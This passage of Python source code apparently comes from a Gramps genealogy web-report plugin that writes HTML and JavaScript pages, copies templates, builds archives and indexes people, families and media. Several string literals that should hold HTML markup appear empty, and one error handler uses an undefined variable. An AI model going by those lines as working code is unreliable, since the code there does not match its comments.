    Women are listed with their maiden name.\")),\n\t\t\t(\"Used for family\", _(\"Used for family\")),\n\t\t\t(\"Used for media\", _(\"Used for media\")),\n\t\t\t(\"Used for person\", _(\"Used for person\")),\n\t\t\t(\"Used for place\", _(\"Used for place\")),\n\t\t\t(\"Used for source\", _(\"Used for source\")),\n\t\t\t(\"Value\", _(\"Value\")),\n\t\t\t(\"Web Link\", _(\"Web Link\")),\n\t\t\t(\"Web Links\", _(\"Web Links\")),\n\t\t\t(\"Without surname\", _(\"Without surname\")),\n\t\t\t(\"Zoom in\", _(\"Zoom in\")),\n\t\t\t(\"Zoom out\", _(\"Zoom out\")),\n\t\t\t):\n\t\t\tsw.write(sep + \"\\\"\" + script_escape(s) + \"\\\": \\\"\" + script_escape(translated) + \"\\\"\")\n\t\t\tsep = \",\\n\"\n\t\tfor (code, translated, s) in EventType._DATAMAP:\n\t\t\tsw.write(sep + \"\\\"\" + script_escape(s) + \"\\\": \\\"\" + script_escape(translated) + \"\\\"\")\n\t\t\tsep = \",\\n\"\n\t\tsw.write(\"\\n};\\n\")\n\t\tsw.write(\n\t\t\t(\"URLTYPE_UNKNOWN = %i;\\n\" % UrlType.UNKNOWN) +\n\t\t\t(\"URLTYPE_CUSTOM = %i;\\n\" % UrlType.CUSTOM) +\n\t\t\t(\"URLTYPE_EMAIL = %i;\\n\" % UrlType.EMAIL) +\n\t\t\t(\"URLTYPE_WEB_HOME = %i;\\n\" % UrlType.WEB_HOME) +\n\t\t\t(\"URLTYPE_WEB_SEARCH = %i;\\n\" % UrlType.WEB_SEARCH) +\n\t\t\t(\"URLTYPE_WEB_FTP = %i;\\n\" % UrlType.WEB_FTP))\n\t\tself.update_file(\"dwr_conf.js\", sw.getvalue(), \"UTF-8\")\n\n\n\tdef _export_html_page(self, filename, title, cmd, menu, scripts = [], styles = []):\n\t\t\"\"\"\n\t\tGenerate an HTML page\n\t\t@param filename: output HTML file name\n\t\t@param title: Title of the page (prepended to L{self.title}\n\t\t@param cmd: Javascript code that generates the page\n\t\t@param menu: Whether to put a menu on the page\n\t\t@param scripts: Scripts embedded in the page\n\t\t@param styles: CSS stylesheets embedded in the page\n\t\t\"\"\"\n\t\t(page, head, body) = self.write_header(title, menu)\n\t\tfor style in styles:\n\t\t\thead += Html(\"link\", rel = \"stylesheet\", href = style, type = \"text/css\")\n\t\tfor script in scripts:\n\t\t\thead += Html(\"script\", language = \"javascript\", src = script, charset = self.encoding)\n\t\tbody += Html(\"script\", cmd, language = \"javascript\")\n\t\tself.update_file(filename, html_text(page))\n\n\n\tdef _export_custom_page(self, filename, title, menu, note):\n\t\t\"\"\"\n\t\tGenerate an HTML custom page\n\t\t@param filename: output HTML file name\n\t\t@param title: Title of the page (prepended to L{self.title}\n\t\t@param menu: Whether to put a menu on the page\n\t\t@param note: note that contains the page contents\n\t\t\"\"\"\n\t\t(page, head, body) = self.write_header(title, menu)\n\t\tif (note):\n\t\t\thtml = self.get_note_format(self.database.get_note_from_gramps_id(note))\n\t\t\tbody += self.replace_note_fields(html)\n\t\tself.update_file(filename, html_text(page))\n\n\n\tdef write_header(self, title, menu):\n\t\t\"\"\"\n\t\tGenerate an HTML page header\n\t\t@param title: Title of the page (prepended to L{self.title}\n\t\t@param menu: Whether to put a menu on the page\n\t\t@return: List of L{Html} objects as follows: (page, head, body)\n\t\t\"\"\"\n\t\t\"\"\"\n\t\tNote. 'title' is used as currentsection in the navigation links and\n\t\tas part of the header title.\n\t\t\"\"\"\n\t\t# Begin each html page...\n\t\txmllang = xml_lang()\n\t\t(page, head, body) = Html.page('%s - %s' % (\n\t\t\t\thtml_escape(title),\n\t\t\t\thtml_escape(self.title.strip()),\n\t\t\t),\n\t\t\tself.encoding, xmllang)\n\t\t# Header constants\n\t\thead += Html(\"meta\", attr = 'name=\"viewport\" content=\"width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1\"')\n\t\thead += Html(\"meta\", attr = 'name=\"apple-mobile-web-app-capable\" content=\"yes\"')\n\t\thead += Html(\"meta\", attr = 'name=\"generator\" content=\"%s %s %s\"' % (PROGRAM_NAME, VERSION, URL_HOMEPAGE))\n\t\thead += Html(\"meta\", attr = 'name=\"author\" content=\"%s\"' % self.author)\n\t\t# Create script and favicon links\n\t\thead += Html(\"link\", type = \"image/x-icon\", href = \"data/favicon.ico\", rel = \"shortcut icon\")\n\t\thead += Html(\"script\", language = 'javascript', src = 'data/dwr_start.js')\n\t\t# Disable menu\n\t\tif (not menu):\n\t\t\tbody.attr = \"class='dwr-menuless'\"\n\t\treturn(page, head, body)\n\n\n\tdef get_header_footer_notes(self, item):\n\t\t\"\"\"\n\t\tGive the header/footer note converted to an HTML string\n\t\t@param item: Option giving the note. See options \"footernote\" and \"headernote\"\n\t\t@return: text of the note\n\t\t@rtype: L{String}\n\t\t\"\"\"\n\t\tnote = self.options[item]\n\t\tif (note):\n\t\t\thtml = self.get_note_format(self.database.get_note_from_gramps_id(note))\n\t\t\treturn(self.replace_note_fields(html))\n\t\treturn(\"\")\n\n\n\tdef replace_note_fields(self, html):\n\t\t\"\"\"\n\t\tModify the notes for HTML pages generation\n\t\tThis allow to add special features or computed data in the pages\n\t\t@param html: Note converted to HTML string\n\t\t@return: Modified string\n\t\t\"\"\"\n\t\ttext = html_text(html)\n\t\t# __SEARCH_FORM__ is replaced by a search form\n\t\ttext = text.replace(\"__SEARCH_FORM__\",\n\t\t\t\"\\n\")\n\t\t# __NB_INDIVIDUALS__ is replaced by the number of persons\n\t\t# __NB_FAMILIES__ is replaced by the number of families\n\t\t# __NB_MEDIA__ is replaced by the number of media objects\n\t\t# __NB_SOURCES__ is replaced by the number of sources\n\t\t# __NB_REPOSITORIES__ is replaced by the number of repositories\n\t\t# __NB_PLACES__ is replaced by the number of places\n\t\ttext = text.replace(\"__NB_INDIVIDUALS__\", str(len(self.obj_dict[Person])))\n\t\ttext = text.replace(\"__NB_FAMILIES__\", str(len(self.obj_dict[Family])))\n\t\ttext = text.replace(\"__NB_MEDIA__\", str(len(self.obj_dict[MediaObject])))\n\t\ttext = text.replace(\"__NB_SOURCES__\", str(len(self.obj_dict[Source])))\n\t\ttext = text.replace(\"__NB_REPOSITORIES__\", str(len(self.obj_dict[Repository])))\n\t\ttext = text.replace(\"__NB_PLACES__\", str(len(self.obj_dict[Place])))\n\t\t# __MEDIA___ is replaced by the media with gramps ID \n\t\t# __THUMB___ is replaced by the thumbnail of the media with gramps ID \n\t\ttext2 = text\n\t\tfor mo in re.finditer(r\"__(MEDIA|THUMB)_(.*?)__\", text):\n\t\t\tgid = mo.group(2)\n\t\t\tmedia = self.database.get_object_from_gramps_id(gid)\n\t\t\tif (not media): continue\n\t\t\ttm = mo.group(1)\n\t\t\tif (tm == \"THUMB\"):\n\t\t\t\tpath = self.copy_thumbnail(media)\n\t\t\t\ttext2 = (\n\t\t\t\t\ttext2[ : -(len(text) - mo.start(0))] +\n\t\t\t\t\t\"\" +\n\t\t\t\t\ttext2[-(len(text) - mo.end(0)) : ])\n\t\t\telse:\n\t\t\t\tpath = self.get_media_web_path(media)\n\t\t\t\ttext2 = (\n\t\t\t\t\ttext2[ : -(len(text) - mo.start(0))] +\n\t\t\t\t\t\"\" +\n\t\t\t\t\ttext2[-(len(text) - mo.end(0)) : ])\n\t\ttext = text2\n\t\t# __EXPORT_DATE__ is replaced by the current date\n\t\t# __GRAMPS_VERSION__ is replaced by the Gramps version\n\t\t# __GRAMPS_HOMEPAGE__ is replaced by the Gramps homepage\n\t\ttext = text.replace(\"__EXPORT_DATE__\", format_date(Today()))\n\t\ttext = text.replace(\"__GRAMPS_VERSION__\", VERSION)\n\t\ttext = text.replace(\"__GRAMPS_HOMEPAGE__\", \"Gramps\")\n\t\t# Relative URL are managed\n\t\ttext = text.replace(\"relative://relative.\", \"\")\n\t\t# __HOME_PERSON_NAME__ is replaced by the home person name\n\t\t# __HOME_PERSON_URL__ is replaced by the home person page URL\n\t\t# center_person = self.database.get_person_from_gramps_id(self.options['pid'])\n\t\t# if (center_person and (center_person.handle in self.obj_dict[Person])):\n\t\t\t# person_name = self.get_name(center_person)\n\t\t\t# person_url = \"person.html?idx=%i\" % self.obj_dict[Person][center_person.handle][OBJDICT_INDEX]\n\t\t\t# text = text.replace(\"__HOME_PERSON_NAME__\", person_name)\n\t\t\t# text = text.replace(\"__HOME_PERSON_URL__\", person_url)\n\t\treturn(text)\n\n\t\t\n\tdef get_copyright_license(self):\n\t\t\"\"\"\n\t\twill return either the text or image of the copyright license\n\t\t\"\"\"\n\t\ttext = \"\"\n\t\tif (self.copyright == 0):\n\t\t\tif self.author:\n\t\t\t\tyear = Today().get_year()\n\t\t\t\ttext = \"\" % {\n\t\t\t\t\t'person' : self.author,\n\t\t\t\t\t'year' : year}\n\t\telif (0 < self.copyright < len(_CC)):\n\t\t\turl = \"data/somerights20.gif\"\n\t\t\ttext = \"\"\n\t\t# return text or image to its callers\n\t\treturn(text)\n\n\n\tdef update_file(self, fout, txt, encoding = None):\n\t\t\"\"\"\n\t\tWrite a string in a file.\n\t\tThe file is not overwritten if the file exists and already contains the string \n\t\t@param fout: output file name\n\t\t@param txt: file contents\n\t\t@param encoding: encoding as passed to Python function codecs.open \n\t\t\"\"\"\n\t\tif (encoding is None): encoding = self.encoding\n\t\tf = os.path.join(self.target_path, fout)\n\t\tself.created_files.append(f)\n\t\tif (os.path.exists(f)):\n\t\t\ttry:\n\t\t\t\tfr = codecs.open(f, \"r\", encoding = encoding, errors=\"xmlcharrefreplace\")\n\t\t\t\ttxtr = fr.read()\n\t\t\t\tfr.close()\n\t\t\t\tif (txtr == txt):\n\t\t\t\t\tlog.info(\"File \\\"%s\\\" not overwritten (identical)\" % fout)\n\t\t\t\t\treturn\n\t\t\texcept:\n\t\t\t\tpass\n\t\tfw = codecs.open(f, \"w\", encoding = encoding, errors=\"xmlcharrefreplace\")\n\t\tfw.write(txt)\n\t\tfw.close()\n\t\tlog.info(\"File \\\"%s\\\" generated\" % fout)\n\n\tdef copy_file(self, from_fname, to_fname, to_dir=\"\"):\n\t\t\"\"\"\n\t\tCopy a file from a source to a (report) destination.\n\t\tIf to_dir is not present and if the target is not an archive,\n\t\tthen the destination directory will be created.\n\n\t\tNormally 'to_fname' will be just a filename, without directory path.\n\n\t\t'to_dir' is the relative path name in the destination root. It will\n\t\tbe prepended before 'to_fname'.\n\t\t\n\t\tThe file is not copied if the contents of 'from_fname' 'to_fname' are identical\n\t\t\"\"\"\n\t\t# log.debug(\"copying '%s' to '%s/%s'\" % (from_fname, to_dir, to_fname))\n\t\tdest = os.path.join(self.target_path, to_dir, to_fname)\n\t\tdestdir = os.path.dirname(dest)\n\t\tif not os.path.isdir(destdir):\n\t\t\tos.makedirs(destdir)\n\n\t\tif from_fname != dest:\n\t\t\ttry:\n\t\t\t\tdest_temp = dest + \".temp\"\n\t\t\t\tshutil.copyfile(from_fname, dest_temp)\n\t\t\t\tself.created_files.append(dest)\n\t\t\t\tif (os.path.exists(dest)):\n\t\t\t\t\tfr = codecs.open(dest, \"rb\")\n\t\t\t\t\told_bytes = fr.read()\n\t\t\t\t\tfr.close()\n\t\t\t\t\tfr = codecs.open(dest_temp, \"rb\")\n\t\t\t\t\tnew_bytes = fr.read()\n\t\t\t\t\tfr.close()\n\t\t\t\t\tif (old_bytes == new_bytes):\n\t\t\t\t\t\tos.remove(dest_temp)\n\t\t\t\t\t\tlog.info(\"File \\\"%s\\\" not overwritten (identical)\" % dest)\n\t\t\t\t\t\treturn\n\t\t\t\t\tos.remove(dest)\n\t\t\t\tos.rename(dest_temp, dest)\n\t\t\t\tlog.info(\"File \\\"%s\\\" generated\" % dest)\n\t\t\texcept:\n\t\t\t\tlog.warning(_(\"Copying error: %(error)s\") % {\"error\": sys.exc_info()[1]})\n\t\t\t\tlog.error(_(\"Impossible to copy \\\"%(src)s\\\" to \\\"%(dst)s\\\"\") % {\"src\": from_fname, \"dst\": to_fname})\n\t\telif self.warn_dir:\n\t\t\tself.user.warn(\n\t\t\t\t_(\"Possible destination error\") + \"\\n\" +\n\t\t\t\t_(\"You appear to have set your target directory \"\n\t\t\t\t \"to a directory used for data storage. This \"\n\t\t\t\t \"could create problems with file management. \"\n\t\t\t\t \"It is recommended that you consider using \"\n\t\t\t\t \"a different directory to store your generated \"\n\t\t\t\t \"web pages.\"))\n\t\t\tself.warn_dir = False\n\n\n\n\tdef copy_template_files(self):\n\t\t\"\"\"\n\t\tCopy the template files to the target directory\n\t\t\n\t\tThe template files are:\n\t\t - The files contained in the chosen template directory,\n\t\t - The files contained in the default template directory, unless they are also present in the chosen template directory\n\t\t\"\"\"\n\t\t# Get template path\n\t\ttmpl_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"templates\", WEB_TEMPLATE_LIST[self.template][0])\n\t\tdefault_tmpl_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"templates\", WEB_TEMPLATE_LIST[0][0])\n\t\ttry:\n\t\t\t# Copy template files\n\t\t\tself.copy_template_files_sub(tmpl_path)\n\t\t\t# Copy default template files if not already copied\n\t\t\tself.copy_template_files_sub(default_tmpl_path)\n\t\texcept:\n\t\t\tlog.error(_(\"Unable to copy web site template files from \\\"%(path)s\\\"\") % {\"path\": tmpl_path})\n\t\t\traise\n\t\t\t\n\tdef copy_template_files_sub(self, tmpl_path):\n\t\t\"\"\"\n\t\tCopy the template files from L{tmpl_path} to the target directory\n\t\tThe files already present in the target directory are not overwritten\n\t\t@param tmpl_path: template directory, as listed in L{WEB_TEMPLATE_LIST}\n\t\t\"\"\"\n\t\tfor (root, dirnames, files) in os.walk(tmpl_path):\n\t\t\tdst_path = root.replace(tmpl_path, self.target_path, 1)\n\t\t\t# Create sub-directories\n\t\t\tfor dirname in dirnames:\n\t\t\t\t# Remove files that have the same name as directories\n\t\t\t\tdstdirname = os.path.join(dst_path, dirname)\n\t\t\t\tif (os.path.isfile(dstdirname) or os.path.islink(dstdirname)):\n\t\t\t\t\tos.remove(dstdirname)\n\t\t\t\t# Create directory if needed\n\t\t\t\tif (not os.path.isdir(dstdirname)):\n\t\t\t\t\tos.mkdir(dstdirname)\n\t\t\t# Copy files\n\t\t\tfor file in files:\n\t\t\t\tsrc = os.path.join(root, file)\n\t\t\t\tdst = os.path.join(dst_path, file)\n\t\t\t\tif (dst in self.created_files):\n\t\t\t\t\t# File was already copied\n\t\t\t\t\tcontinue\n\t\t\t\tif (os.path.isfile(dst)):\n\t\t\t\t\t# If file already exists, check dates\n\t\t\t\t\tstat_src = os.stat(src)\n\t\t\t\t\tstat_dst = os.stat(dst)\n\t\t\t\t\t# If target file is newer, do not overwrite => If target file is older, delete it\n\t\t\t\t\tif (stat_src.st_mtime >= stat_dst.st_mtime):\n\t\t\t\t\t\tos.remove(dst)\n\t\t\t\t\telse:\n\t\t\t\t\t\tlog.info(_(\"Keeping \\\"%(dst)s\\\" (newer than \\\"%(src)s\\\")\") % {'src': src, 'dst': dst})\n\t\t\t\tif (not os.path.exists(dst)):\n\t\t\t\t\tshutil.copyfile(src, dst)\n\t\t\t\t\tlog.info(_(\"Copying \\\"%(src)s\\\" to \\\"%(dst)s\\\"\") % {'src': src, 'dst': dst})\n\t\t\t\tself.created_files.append(dst)\n\n\n\tdef create_archive(self):\n\t\t\"\"\"\n\t\tCreate an archive of the whole web site\n\t\t\"\"\"\n\t\tif (not self.options['archive']): return\n\t\t\n\t\t# Get archive path and type\n\t\tarch_path = self.options['archive_file']\n\t\text = os.path.splitext(arch_path)[1].lower()\n\t\tif (ext not in [\".zip\", \".tgz\"]):\n\t\t\tarch_path += \".zip\"\n\t\t\text = \".zip\"\n\t\t\n\t\tif (os.path.isdir(arch_path)):\n\t\t\tlog.error(_('Invalid file name'))\n\t\t\tlog.error(_('The archive file must be a file, not a directory'))\n\t\t\treturn\n\t\t\t\n\t\t# Get base path for the files inside the archive\n\t\tbasepath = os.path.splitext(os.path.basename(arch_path))[0]\n\t\t\n\t\tif (ext == \".zip\"):\n\t\t\ttry:\n\t\t\t\tfzip = zipfile.ZipFile(arch_path, \"w\", zipfile.ZIP_DEFLATED, True)\n\t\t\texcept:\n\t\t\t\tlog.error(_(\"Unable to overwrite archive file \\\"%(path)s\\\"\") % {\"path\": arch_path})\n\t\t\t\traise\n\t\t\tfor file in self.created_files:\n\t\t\t\tarc_rel_path = file.replace(self.target_path, basepath, 1)\n\t\t\t\tif (sys.version_info[0] < 3):\n\t\t\t\t\tfile = file.encode(\"cp437\")\n\t\t\t\t\tarc_rel_path = arc_rel_path.encode(\"cp437\")\n\t\t\t\ttry:\n\t\t\t\t\tfzip.write(file, arc_rel_path)\n\t\t\t\texcept:\n\t\t\t\t\tlog.error(_(\"Unable to add file \\\"%(file)s\\\" to archive \\\"%(archive)s\\\"\") % {\"file\": file, \"archive\": arch_path})\n\t\t\t\t\traise\n\t\t\tfzip.close()\n\n\t\tif (ext == \".tgz\"):\n\t\t\ttry:\n\t\t\t\ttgz = tarfile.open(arch_path, \"w:gz\")\n\t\t\texcept:\n\t\t\t\tlog.error(_(\"Unable to overwrite archive file \\\"%(path)s\\\"\") % {\"path\": arch_path})\n\t\t\t\traise\n\t\t\tfor file in self.created_files:\n\t\t\t\tarc_rel_path = file.replace(self.target_path, basepath, 1)\n\t\t\t\ttry:\n\t\t\t\t\ttgz.add(file, arc_rel_path)\n\t\t\t\texcept:\n\t\t\t\t\tlog.error(_(\"Unable to add file \\\"%(file)s\\\" to archive \\\"%(archive)s\\\"\") % {\"file\": path, \"archive\": arch_path})\n\t\t\t\t\traise\n\t\t\ttgz.close()\n\n\n\tdef build_link(self, prop, handle, obj_class):\n\t\t\"\"\"\n\t\tBuild a link to an item.\n\t\t\n\t\tThis function is used when converting a Gramps note with hyperlinks into an HTML string\n\t\t\"\"\"\n\t\tif prop == \"gramps_id\":\n\t\t\tif obj_class in self.database.get_table_names():\n\t\t\t\tobj = self.database.get_table_metadata(obj_class)[\"gramps_id_func\"](handle)\n\t\t\t\tif obj:\n\t\t\t\t\thandle = obj.get_handle()\n\t\t\t\telse:\n\t\t\t\t\traise AttributeError(\"gramps_id '%s' not found in '%s'\" % handle, obj_class)\n\t\t\telse:\n\t\t\t\traise AttributeError(\"invalid gramps_id lookup in table name '%s'\" % obj_class)\n\t\thref = \"search.html\"\n\t\ti = -1\n\t\tif (obj_class == \"Person\"):\n\t\t\thref = \"person.html\"\n\t\t\tif (handle in self.obj_dict[Person]):\n\t\t\t\thref = \"%s?idx=%i\" % (href, self.obj_dict[Person][handle][OBJDICT_INDEX])\n\t\telif (obj_class == \"Family\"):\n\t\t\thref = \"family.html\"\n\t\t\tif (handle in self.obj_dict[Family]):\n\t\t\t\thref = \"%s?fdx=%i\" % (href, self.obj_dict[Family][handle][OBJDICT_INDEX])\n\t\telif (obj_class == \"Source\"):\n\t\t\thref = \"source.html\"\n\t\t\tif (handle in self.obj_dict[Source]):\n\t\t\t\thref = \"%s?sdx=%i\" % (href, self.obj_dict[Source][handle][OBJDICT_INDEX])\n\t\telif (obj_class == \"Citation\"):\n\t\t\thref = \"source.html\"\n\t\t\tsource_handle = self.database.get_citation_from_handle(handle).get_reference_handle()\n\t\t\tif (source_handle in self.obj_dict[Source]):\n\t\t\t\thref = \"%s?sdx=%i\" % (href, self.obj_dict[Source][source_handle][OBJDICT_INDEX])\n\t\telif (obj_class == \"Repository\"):\n\t\t\thref = \"repository.html\"\n\t\t\tif (handle in self.obj_dict[Repository]):\n\t\t\t\thref = \"%s?rdx=%i\" % (href, self.obj_dict[Repository][handle][OBJDICT_INDEX])\n\t\telif (obj_class == \"Media\"):\n\t\t\thref = \"media.html\"\n\t\t\tif (handle in self.obj_dict[MediaObject]):\n\t\t\t\thref = \"%s?mdx=%i\" % (href, self.obj_dict[MediaObject][handle][OBJDICT_INDEX])\n\t\telif (obj_class == \"Place\"):\n\t\t\thref = \"place.html\"\n\t\t\tif (handle in self.obj_dict[Place]):\n\t\t\t\thref = \"%s?pdx=%i\" % (href, self.obj_dict[Place][handle][OBJDICT_INDEX])\n\t\telse:\n\t\t\tprint(_(\"DynamicWebReport ignoring link type '%(class)s'\") % {\"class\": obj_class})\n\t\treturn(href)\n\n\n\tdef _data_bkref_index(self, obj_class, obj_handle, ref_class):\n\t\t\"\"\"\n\t\tBuild a list of object indexes referencing a given object\n\t\t@param obj_class: Referenced object class\n\t\t@param obj_handle: Referenced object handle\n\t\t@param ref_class: Class of the refencing objects\n\t\t@return: String representing the Javascript Array of the object indexes (of class L{ref_class}) referencing a given object (L{obj_class}, L{obj_handle})\n\t\t\"\"\"\n\t\tbkref_list = self.bkref_dict[obj_class][obj_handle]\n\t\tif (not bkref_list): return (\"[]\")\n\t\t# Sort by referenced object\n\t\tbkref_list = sorted(bkref_list, key = lambda bkref: self.obj_dict[bkref[BKREF_CLASS]][bkref[BKREF_HANDLE]][OBJDICT_NAME])\n\t\t# Filter bkref_list (keep only ref_class) and remove duplicates\n\t\tseen = set()\n\t\tbkref_list = [bkref_handle\n\t\t\tfor (bkref_class, bkref_handle, media_ref) in bkref_list\n\t\t\tif (bkref_class == ref_class and not (bkref_handle in seen or seen.add(bkref_handle)))]\n\t\treturn(\"[\" +\n\t\t\t\",\".join([str(self.obj_dict[ref_class][bkref_handle][OBJDICT_INDEX]) for bkref_handle in bkref_list]) +\n\t\t\t\"]\")\n\n\n\tdef _data_repo_backref_index(self, repo, ref_class):\n\t\t\"\"\"\n\t\tBuild a list of object referencing a given repository, in the form:\n\t\t - object index (in table 'I', 'F', 'S')\n\t\t - media type\n\t\t - call number\n\t\t - notes of the repository reference\n\t\t@param repo: Referenced repository\n\t\t@param ref_class: Class of the refencing objects\n\t\t@return: String representing the Javascript Array of the references to L{repo}\n\t\t\"\"\"\n\t\trepo_handle = repo.get_handle()\n\t\tif (repo_handle not in self.obj_dict[Repository]): return(\"[]\")\n\t\tbkref_list = self.bkref_dict[Repository][repo_handle]\n\t\tif (not bkref_list): return (\"[]\")\n\t\tsep = \"\"\n\t\ttxt = \"[\"\n\t\tfor (bkref_class, bkref_handle, repo_ref) in bkref_list:\n\t\t\tif (ref_class != bkref_class): continue\n\t\t\ti = self.obj_dict[ref_class][bkref_handle][OBJDICT_INDEX]\n\t\t\tobject = self.get_object_from_handle(bkref_class, bkref_handle)\n\t\t\ttxt += sep + self._data_repo_ref(repo_ref, i)\n\t\t\tsep = \",\"\n\t\ttxt += \"]\"\n\t\treturn(txt)\n\n\tdef _data_media_backref_index(self, media, ref_class):\n\t\t\"\"\"\n\t\tBuild a list of object referencing a given media, in the form:\n\t\t - object index (in table 'I', 'F', 'S')\n\t\t - media thumbnail path\n\t\t - [x1, y1, x2, y2] of the media reference\n\t\t - notes of the media reference\n\t\t - list of the media reference source citations index (in table 'C')\n\t\t@param media: Referenced repository\n\t\t@param ref_class: Class of the refencing objects\n\t\t@return: String representing the Javascript Array of the references to L{media}\n\t\t\"\"\"\n\t\tmedia_handle = media.get_handle()\n\t\tif (media_handle not in self.obj_dict[MediaObject]): return(\"[]\")\n\t\tbkref_list = self.bkref_dict[MediaObject][media_handle]\n\t\tif (not bkref_list): return (\"[]\")\n\t\tsep = \"\"\n\t\ttxt = \"[\"\n\t\tfor (bkref_class, bkref_handle, media_ref) in bkref_list:\n\t\t\tif (ref_class != bkref_class): continue\n\t\t\ti = self.obj_dict[ref_class][bkref_handle][OBJDICT_INDEX]\n\t\t\tobject = self.get_object_from_handle(bkref_class, bkref_handle)\n\t\t\ttxt += sep + self._data_media_ref(media_ref, i)\n\t\t\tsep = \",\"\n\t\ttxt += \"]\"\n\t\treturn(txt)\n\n\n\tdef get_object_from_handle(self, class_, handle):\n\t\t\"\"\"\n\t\tGet an object from its handle and class\n\t\t\"\"\"\n\t\tobject = None\n\t\tif (class_ == Person):\n\t\t\tobject = self.database.get_person_from_handle(handle)\n\t\telif (class_ == Family):\n\t\t\tobject = self.database.get_family_from_handle(handle)\n\t\telif (class_ == Event):\n\t\t\tobject = self.database.get_event_from_handle(handle)\n\t\telif (class_ == Source):\n\t\t\tobject = self.database.get_source_from_handle(handle)\n\t\telif (class_ == Citation):\n\t\t\tobject = self.database.get_citation_from_handle(handle)\n\t\telif (class_ == Place):\n\t\t\tobject = self.database.get_place_from_handle(handle)\n\t\telif (class_ == Repository):\n\t\t\tobject = self.database.get_repository_from_handle(handle)\n\t\treturn(object)\n\n\n\t##############################################################################################\n\t################################################################################## GENDEX data\n\t##############################################################################################\n\n\tdef build_gendex(self, ind_list):\n\t\tif (not self.inc_gendex): return\n\t\tfp_gendex = StringIO()\n\t\tfor person_handle in ind_list:\n\t\t\tself.write_gendex(fp_gendex, person_handle)\n\t\tself.update_file(\"gendex.txt\", fp_gendex.getvalue())\n\n\tdef write_gendex(self, fp, person_handle):\n\t\t\"\"\"\n\t\tReference|SURNAME|given name /SURNAME/|date of birth|place of birth|date of death|place of death|\n\t\t* field 1: file name of web page referring to the individual\n\t\t* field 2: surname of the individual\n\t\t* field 3: full name of the individual\n\t\t* field 4: date of birth or christening (optional)\n\t\t* field 5: place of birth or christening (optional)\n\t\t* field 6: date of death or burial (optional)\n\t\t* field 7: place of death or burial (optional) \n\t\t\"\"\"\n\t\tif (not(person_handle and (person_handle in self.obj_dict[Person]))): return\n\t\tperson = self.database.get_person_from_handle(person_handle)\n\t\turl = \"person.html?idx=%i\" % self.obj_dict[Person][person_handle][OBJDICT_INDEX]\n\t\tsurname = person.get_primary_name().get_surname()\n\t\tfullname = person.get_primary_name().get_gedcom_name()\n\t\t\n\t\t# get birth info:\n\t\t(dob, pob) = self.get_gendex_data(person.get_birth_ref())\n\t\t\n\t\t# get death info:\n\t\t(dod, pod) = self.get_gendex_data(person.get_death_ref())\n\t\tfp.write(\n\t\t\t'|'.join((url, surname, fullname, dob, pob, dod, pod)) + '|\\n')\n\n\tdef get_gendex_data(self, event_ref):\n\t\t\"\"\"\n\t\tGiven an event, return the date and place a strings\n\t\t\"\"\"\n\t\tdoe = \"\" # date of event\n\t\tpoe = \"\" # place of event\n\t\tif (event_ref):\n\t\t\tevent = self.database.get_event_from_handle(event_ref.ref)\n\t\t\tif (event):\n\t\t\t\tdate = event.get_date_object()\n\t\t\t\tdoe = format_date(date, gedcom = True)\n\t\t\t\tif (event.get_place_handle()):\n\t\t\t\t\tplace_handle = event.get_place_handle()\n\t\t\t\t\tif (place_handle):\n\t\t\t\t\t\tplace = self.database.get_place_from_handle(place_handle)\n\t\t\t\t\t\tif (place):\n\t\t\t\t\t\t\tif (DWR_VERSION_412):\n\t\t\t\t\t\t\t\tpoe = _pd.display(self.database, place)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tpoe = place.get_title()\n\t\treturn(doe, poe)\n\t\t\n\n\t##############################################################################################\n\t##############################################################################################\n\t#\n\t# Objects dictionaries construction\n\t#\n\t##############################################################################################\n\t##############################################################################################\n\n\tdef _build_obj_dict(self):\n\t\t\"\"\"\n\t\tConstruct the dictionaries of objects to be included in the reports. There\n\t\tare two dictionaries, which have the same structure: they are two level\n\t\tdictionaries,the first key is the class of object (e.g. gen.lib.Person).\n\t\tThe second key is the handle of the object.\n\n\t\tFor the obj_dict, the value is a tuple containing:\n\t\t - the gramps_id\n\t\t - the text name for the object\n\t\t - the index (number starting at 0)\n\n\t\tFor the bkref_dict, the value is a tuple containing:\n\t\t - the class of object that refers to the 'key' object\n\t\t - the handle for the object that refers to the 'key' object\n\t\t - the reference object:\n\t\t\t- None in most cases\n\t\t\t- for media it is a MediaRef object\n\t\t\n\t\tThis method recursively calls the methods \"_add_***\"\n\t\t\"\"\"\n\t\t_obj_class_list = (Person, Family, Event, Place, Source, Citation,\n\t\t\t\t\t\t MediaObject, Repository, Note, Tag)\n\n\t\t# setup a dictionary of the required structure\n\t\tself.obj_dict = defaultdict(lambda: defaultdict(set))\n\t\tself.bkref_dict = defaultdict(lambda: defaultdict(set))\n\n\n\t\t# initialise the dictionary to empty in case no objects of any\n\t\t# particular class are included in the web report\n\t\tfor obj_class in _obj_class_list:\n\t\t\tself.obj_dict[obj_class] = defaultdict(set)\n\n\t\tind_list = self.database.iter_person_handles()\n\t\twith self.user.progress(_(\"Dynamic Web Site Report\"),\n\t\t\t\t\t\t\t\t _(\"Applying Person Filter...\"),\n\t\t\t\t\t\t\t\t self.database.get_number_of_people()) as step:\n\t\t\tind_list = self.filter.apply(self.database, ind_list,\n\t\t\t\t\t\t\t\t\t\t step)\n\n\t\twith self.user.progress(_(\"Dynamic Web Site Report\"),\n\t\t\t\t\t\t\t\t _(\"Constructing list of other objects...\"),\n\t\t\t\t\t\t\t\t sum(1 for _ in ind_list)) as step:\n\t\t\tfor handle in ind_list:\n\t\t\t\t# FIXME work around bug that self.database.iter under python 3\n\t\t\t\t# returns (binary) data rather than text\n\t\t\t\tif (not isinstance(handle, UNITYPE)):\n\t\t\t\t\thandle = handle.decode(\"UTF-8\")\n\t\t\t\tstep()\n\t\t\t\tself._add_person(handle, \"\", \"\")\n\n\t\tlog.debug(\"final object dictionary \\n\" +\n\t\t\t\t \"\".join((\"%s: %s\\n\" % item) for item in self.obj_dict.items()))\n\n\t\tlog.debug(\"final backref dictionary \\n\" +\n\t\t\t\t \"\".join((\"%s: %s\\n\" % item) for item in self.bkref_dict.items()))\n\n\n\tdef _add_person(self, person_handle, bkref_class, bkref_handle):\n\t\t\"\"\"\n\t\tAdd person_handle to the L{self.obj_dict}, and recursively all referenced objects\n\t\t\"\"\"\n\t\t# Update the dictionaries of objects back references\n\t\tself.bkref_dict[Person][person_handle].add((bkref_class, bkref_handle, None))\n\t\t# Check if the person is already added\n\t\tif (person_handle in self.obj_dict[Person]): return\n\t\t# Add person in 